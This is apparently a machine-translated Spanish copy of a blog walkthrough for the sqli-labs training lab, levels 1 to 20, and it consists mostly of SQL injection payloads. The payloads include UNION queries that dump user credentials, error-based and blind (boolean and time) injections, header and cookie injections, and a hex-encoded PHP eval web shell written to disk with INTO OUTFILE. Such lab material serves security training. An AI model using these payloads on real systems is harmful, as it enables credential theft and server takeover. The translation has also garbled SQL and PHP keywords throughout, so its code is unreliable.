SQLi-laboratorios de la página-1

Others 2020-03-09 23:12:39 views: null

Construir e instalar

Referencia: https: //www.fujieace.com/penetration-test/sqli-labs-ec.html

Descargar: sqli-Labs descarga

Fuera de los diez primeros son del tipo GET

En primer lugar: comillas simples dadas por inyección

? Id = -1' union select 1, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users), 3 - +

El segundo obstáculo: la inyección de error numérico

? Id = 0-1 union select 1, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users), 3

Tercer paso: comillas simples paréntesis derecho inyección administrada

? Id = -1' ) union select 1, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users), 3 - +

Cuarta entrada: comillas dobles paréntesis derecho inyección administrada

? Id = -1" ) unión seleccionar 1, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users), 3 - +

En quinto lugar fuera: la inyección de error consulta dobles comillas simples

Por ExtractValue renunciado a la salida de 32 bits.

? Id = 1' y extractvalue (1, concat (0x23, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users), 0x23)) - +

Updatexml dado por, salida de hasta 32

? Id = 1' y updatexml (1, concat (0x23, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users), 0x23), 1) - +

Error por baja

? Id = 1' y (seleccione 1 a partir de (recuento de selección (*), concat (concat ((select concat (nombre de usuario, 0x7E, contraseña, 0x7E) de security.users limitan 0,1), 0x7E), suelos (rand ( 0) * 2)) x desde INFORMATION_SCHEMA.TABLES grupo por x) y) - +

Sexto apagado: Desactivado es el quinto single cita se convierte en comillas dobles

La séptima entrada: en archivo_salida a la cáscara de escritura

? Id = 1' )) union select nula, 0x3c3f706870206576616c28245f504f53545b2774657374275d293f3e, nulo en archivo_salida 'C: \\ \\ phpStudy WWW \\ \\ SQLi-labs Menos-7 \\ 1.php' - +

El séptimo paso que hay un problema, con el fin de ser capaz de escribir en el fichero en el archivo de salida debe estar en el archivo my.ini mysqld MySQL en el siguiente escrito secure_file_priv =

Debido secure_file_priv = NULL, no se puede escribir en el archivo.

Octava entrada: Boolean sola cotizaciones ciegos

Análisis de longitud de base de datos

? Id = 1' y (longitud (base de datos ())) = 8 - +

Adivinar nombre de la biblioteca

? id = 1' e izquierda ((seleccione la base de datos ()), 1) = 's' - +
? id = 1 'e izquierda ((seleccione la base de datos ()), 2) =' se '- +
? id = 1' e izquierda ((Seleccionar base de datos ()), 3) = 'sec' - +
? id = 1 'e izquierda ((seleccione la base de datos ()), 4) =' secu '- +
? id = 1' e izquierda ((seleccione la base de datos ()), 5) = 'seg' - +
? id = 1 'e izquierda ((seleccione la base de datos ()), 6) =' securi '- +
? id = 1' e izquierda ((seleccione la base de datos ()), 7) = 'securit' - +
? id = 1 'e izquierda ((seleccione la base de datos ()), 8) =' seguridad "- +

Longitud, los usuarios determina la longitud de la cuarta tabla 5

? Id = 1' y (longitud ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = base de datos () límite de 3,1))) = 5 - +

Adivinar el nombre de la tabla

? id = 1' e izquierda ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = base de datos () límite de 3,1), 1) = 'u' - +
? id = 1 'e izquierda ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = base de datos () límite de 3,1), 2) = 'nosotros' - +
? id = 1' e izquierda ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = base de datos () límite de 3,1), 3) = ' uso ' - +
? id = 1 'e izquierda ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = base de datos () límite de 3,1), 4) = 'usuario' - +
? Id = 1' e izquierda ((select nombre_tabla de INFORMATION_SCHEMA.TABLES donde esquema_tabla = base de datos () límite de 3,1), 5) = 'usuarios' - +

El resto de la similar, pero se puede reemplazar lo que la carga útil.

El noveno paso: una comilla tiempo ciego

La determinación de la longitud de la base de datos, la longitud correcta sleep5 segundos.

? Id = 1' y si (longitud (base de datos ()) = 8, del sueño (5), 1) - +

Adivinar nombre de la biblioteca, corregirlo sleep5 segundos

? Id = 1' y si (a la izquierda (la base de datos (), 8) = 'seguridad', el sueño (5), 1) - +

Lo mismo ocurre con el resto de la octava entrada.

Décima de segundo: el noveno pase entre comillas simples a las comillas dobles

tipo POST puede estar recubierta con eructo intercepción modificado

Misión 11: inyección está dando comilla simple

uname = -admin' union select 1, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users) - + Y = admin passwd y publica = Enviar

En primer lugar sustancialmente ninguna diferencia, con tal de que el número dos, y los nombres de usuario y contraseñas pueden ser inyectados en la columna.

Off XII: comillas dobles paréntesis derecho aplicó la inyección

uname = -admin ") union select 1, (seleccione GROUP_CONCAT (nombre de usuario, 0x3a, password) de security.users) - + Y = admin passwd y publica = Enviar

Decimotercera Off: comilla simple cierre de la práctica de inyección de error paréntesis similar al mismo nivel 5, sólo tiene que escribir en un POST

Decimocuarta Off: comillas dobles dadas las prácticas de inyección son todavía el mismo nivel 5 Del mismo modo, el tipo de POST

XV Off: Boolean o cotizaciones en tiempo simple ciego

Tiempo base de datos de tipo retardado longitud de la ráfaga

uname = admin' y si (longitud (base de datos ()) = 8, dormir (5), 1) - + Y = admin passwd y publica = Enviar

base de datos Boolean longitud de la ráfaga

uname = admin' y (longitud (base de datos ())) = 8 - + Y = admin passwd y publica = Enviar

Refiriéndose a 8,9 OFF.

Off XVI: Boolean o comillas dobles tiempo-de-ciegos

Este nombre es Guan dijo comillas dobles, comillas dobles, pero no se encontró cerrado, es necesario añadir comillas dobles para cerrar paréntesis derecho, al hacerlo, así que no estoy seguro que no es un problema de mi propio entorno.

Al igual que la práctica de quince fuera.

fuera XVII: la inyección de actualización

@ $ Sql = "SELECT nombre de usuario, contraseña FROM usuarios WHERE nombre de usuario = $ uname LÍMITE 0,1" ;

$ resultado = mysql_query ( $ sql );
$ fila = mysql_fetch_array ( $ resultado );
// echo $ fila; 
    si ( $ fila )
    { 
        $ Fila1 = $ fila [ 'username' ];      
        // echo 'Su nombre de usuario:'. $ fila1; 
        $ actualización = "usuarios Actualizar contraseña SET = ' $ passwd ' WHERE nombre = ' $ fila1 '" ;
        mysql_query ( $ al día );
          eco "<br>";

carga útil:

uname = admin y passwd = admin' y updatexml (1, concat (0x7E, la base de datos (), 0x7E), 1) - + Y submit = Enviar

XVIII apagado: la inyección de errores de la UA

$ sql = "SELECT users.username, users.password de los usuarios DONDE users.username = $ uname y users.password = $ passwd ORDER BY DESC LIMIT users.id 0,1" ;
    $ resultado1 = mysql_query ( $ sql );
    $ fila1 = mysql_fetch_array ( $ resultado1 );
        si ( $ fila1 )
            {
            echo '<font color = "# FFFF00" font size = 3>' ;
            $ inserto = "INSERT INTO` security`.`uagents` ( `uagent`,` ip_address`, `username`) VALORES ( ' $ uagent ', ' $ IP ', $ uname )" ;
            mysql_query ( $ inserción );

carga útil:

User-Agent: 'y updatexml (1, concat (0x23, (versión ()), 0x23), 1) y'

Dos comillas simples antes y después, pero cerca de '$ uagent' antes y después de las dos marcas.

XIX Apagado: la inyección Referer está dando

$ sql = "SELECT users.username, users.password de los usuarios DONDE users.username = $ uname y users.password = $ passwd ORDER BY DESC LIMIT users.id 0,1" ;
    $ resultado1 = mysql_query ( $ sql );
    $ fila1 = mysql_fetch_array ( $ resultado1 );
        si ( $ fila1 )
            {
            echo '<font color = "# FFFF00" font size = 3>' ;
            $ inserto = "INSERT INTO` security`.`referers` ( `referer`,` ip_address`) VALUES ( ' $ uagent ', ' $ IP ')" ;
            mysql_query ( $ inserción );

carga útil de la construcción:

Referer: 'y updatexml (1, concat (0x23, (base de datos ()), 0x23), 1) y'

Veinte-Off: Galleta está dando la inyección

20 se desconectará una vez, después de inicio de sesión correcto dará una galleta, vuelva a cargar la página se puede ver lo que una cookie en el eructo

$ sql = "SELECT users.username, users.password de los usuarios DONDE users.username = $ uname y users.password = $ passwd ORDER BY DESC LIMIT users.id 0,1" ;
        $ resultado1 = mysql_query ( $ sql );
        $ fila1 = mysql_fetch_array ( $ resultado1 );
        $ Cookee = $ fila1 [ 'username' ];
            si ( $ fila1 )
                {
                echo '<font color = "# FFFF00" font size = 3>' ;
                setcookie ( 'uname', $ Cookee , el tiempo () 3600 );    
                cabecera ( 'Location: index.php' );
                eco "Te Amo cookies";
$ Cookee = $ _COOKIE [ 'uname' ];
            $ formato = 'D d MI - H: i: s' ;
            $ timestamp = tiempo () + 3600;

carga útil:

Cookie: unión =' uname seleccionar 1, la base de datos (), versión () #

Supongo que te gusta

Origin www.cnblogs.com/-an-/p/12448610.html
Recomendado
Clasificación
Diario
Más
2024-06-15(0)
2024-06-14(0)
2024-06-13(0)
2024-06-12(0)
2024-06-11(0)
2024-06-10(0)
2024-06-09(0)
2024-06-08(0)
2024-06-07(0)
2024-06-06(0)

Code World

© 2018 codetd.com